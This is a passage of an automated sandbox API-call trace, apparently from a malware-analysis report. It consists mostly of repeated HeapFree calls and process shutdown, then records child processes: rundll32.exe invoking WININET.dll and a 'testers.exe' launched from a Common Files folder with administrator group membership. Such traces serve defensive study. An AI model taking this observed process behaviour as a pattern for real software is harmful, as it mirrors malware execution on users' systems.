hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96748 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff230 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96730 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff220 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96718 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff210 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96700 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff200 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd966e8 | out: hHeap=0xb80000) returned 1 [0269.801] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff1f0 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd966d0 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff1e0 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd966b8 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff1d0 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd966a0 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff1c0 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96688 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff1b0 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96670 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff1a0 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96658 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff190 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96640 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff160 | out: hHeap=0xb80000) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdac918 | out: hHeap=0xb80000) returned 1 [0269.802] KillTimer (hWnd=0x0, uIDEvent=0x7fc1) returned 1 [0269.802] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff280 | out: hHeap=0xb80000) returned 1 [0269.802] NtdllDialogWndProc_W () returned 0x0 [0269.807] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.807] NtdllDialogWndProc_W () returned 0x0 [0269.808] DeleteObject (ho=0x8f100708) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b1d0 | out: hHeap=0xb80000) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b200 | out: hHeap=0xb80000) returned 1 [0269.808] DeleteObject (ho=0x281001ca) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b1b8 | out: hHeap=0xb80000) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b188 | out: hHeap=0xb80000) returned 1 [0269.808] DeleteObject (ho=0x28100725) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96868 | out: hHeap=0xb80000) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd965c8 | out: hHeap=0xb80000) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aff0 | out: hHeap=0xb80000) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdabbb0 | out: hHeap=0xb80000) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffdc0 | out: hHeap=0xb80000) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b218 | out: hHeap=0xb80000) returned 1 [0269.808] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffdf0 | out: hHeap=0xb80000) returned 1 [0269.809] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdabbe0 | out: hHeap=0xb80000) returned 1 [0269.809] PostQuitMessage (nExitCode=0) [0269.809] GetMessageW (in: lpMsg=0x75f9c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x75f9c4) returned 0 [0269.809] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98b00 | out: hHeap=0xb80000) returned 1 [0269.809] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98f08 | out: hHeap=0xb80000) returned 1 [0269.809] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89630 | out: hHeap=0xb80000) returned 1 [0269.809] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99268 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc895e0 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc958b0 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99298 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99280 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc992b0 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc992c8 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc992e0 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98dd0 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98ab8 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc895b8 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98650 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98aa0 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89568 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc958a0 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc991f0 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc991d8 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99208 | out: hHeap=0xb80000) returned 1 [0269.819] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99220 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89590 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc894f0 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95870 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99130 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99118 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99148 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98ad0 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95880 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99178 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99160 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89540 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95890 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc991a8 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99190 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc991c0 | out: hHeap=0xb80000) returned 1 [0269.820] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89518 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc986c8 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95840 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99058 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99040 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98a88 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95850 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99088 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99070 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc990a0 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98b30 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95860 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc990d0 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc990b8 | out: hHeap=0xb80000) returned 1 [0269.821] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc990e8 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99100 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc894c8 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98b48 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95800 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98f38 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98f20 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9e5c0 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95810 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98f68 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98f50 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98f80 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc894a0 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95820 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98fb0 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98f98 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98fc8 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc03678 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95830 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98ff8 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98fe0 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99010 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc99028 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89478 | out: hHeap=0xb80000) returned 1 [0269.822] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98668 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc957c0 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98e00 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98de8 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9e588 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc957d0 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98e30 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98e18 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98e48 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89428 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc957e0 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98e78 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98e60 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98e90 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9e5f8 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc957f0 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98ec0 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98ea8 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98ed8 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98ef0 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89450 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98b18 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95780 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc986e0 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98740 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9e550 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95790 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98cf8 | out: hHeap=0xb80000) returned 1 [0269.823] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98ce0 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98d10 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc893d8 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc957a0 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98d40 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98d28 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98d58 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98698 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc957b0 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98d88 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98d70 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98da0 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98db8 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc89400 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98710 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95740 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98b78 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98b60 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98728 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95750 | out: hHeap=0xb80000) returned 1 [0269.824] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98ba8 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98b90 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98bc0 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98a70 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95760 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98bf0 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98bd8 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98c08 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc893b0 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95770 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98c38 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98c20 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98c50 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98c68 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98c80 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98c98 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98cb0 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98cc8 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc9e518 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98638 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95720 | out: hHeap=0xb80000) returned 1 [0269.828] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98770 | out: hHeap=0xb80000) returned 1 [0269.829] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98758 | out: hHeap=0xb80000) returned 1 [0269.829] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc989c8 | out: hHeap=0xb80000) returned 1 [0269.829] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc989e0 | out: hHeap=0xb80000) returned 1 [0269.829] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc989f8 | out: hHeap=0xb80000) returned 1 [0269.829] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc23848 | out: hHeap=0xb80000) returned 1 [0269.829] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc95730 | out: hHeap=0xb80000) returned 1 [0269.829] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc98a28 | out: hHeap=0xb80000) returned 1 [0269.831] SetCurrentDirectoryW (lpPathName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 1 [0269.835] mciSendStringW (in: lpstrCommand="close all", lpstrReturnString=0x0, uReturnLength=0x0, hwndCallback=0x0 | out: lpstrReturnString=0x0) returned 0x0 [0269.836] OleUninitialize () Thread: id = 298 os_tid = 0xe8 Thread: id = 299 os_tid = 0xdc Thread: id = 300 os_tid = 0xd0 Thread: id = 302 os_tid = 0xd4 Thread: id = 303 os_tid = 0xd8 Thread: id = 305 os_tid = 0x3c8 Thread: id = 306 os_tid = 0x7d8 Thread: id = 308 os_tid = 0x6bc Process: id = "42" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x5d703000" os_pid = "0x65c" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0xe0" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 301 os_tid = 0x4bc Thread: id = 304 os_tid = 0x110 Thread: id = 307 os_tid = 0x4a4 Thread: id = 309 os_tid = 0x2ac Thread: id = 310 os_tid = 0x778 Thread: id = 311 os_tid = 0x4f4 Process: id = "43" image_name = "testers.exe" filename = "c:\\progra~2\\common~1\\testers.exe" page_root = "0x5ccfe000" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0xe0" cmd_line = "C:\\PROGRA~2\\COMMON~1\\testers.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 312 os_tid = 0x668 [0270.147] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ffc90 | out: lpSystemTimeAsFileTime=0x8ffc90*(dwLowDateTime=0x4261b360, dwHighDateTime=0x1d661be)) [0270.148] GetCurrentThreadId () returned 0x668 [0270.148] GetCurrentProcessId () returned 0x67c [0270.148] QueryPerformanceCounter (in: lpPerformanceCount=0x8ffc88 | out: lpPerformanceCount=0x8ffc88*=20067992517) returned 1 [0270.185] GetStartupInfoW (in: lpStartupInfo=0x8ffc20 | out: lpStartupInfo=0x8ffc20*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7737fd35, hStdError=0x773e7daf)) [0270.185] GetProcessHeap () returned 0xcc0000 [0270.187] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75990000 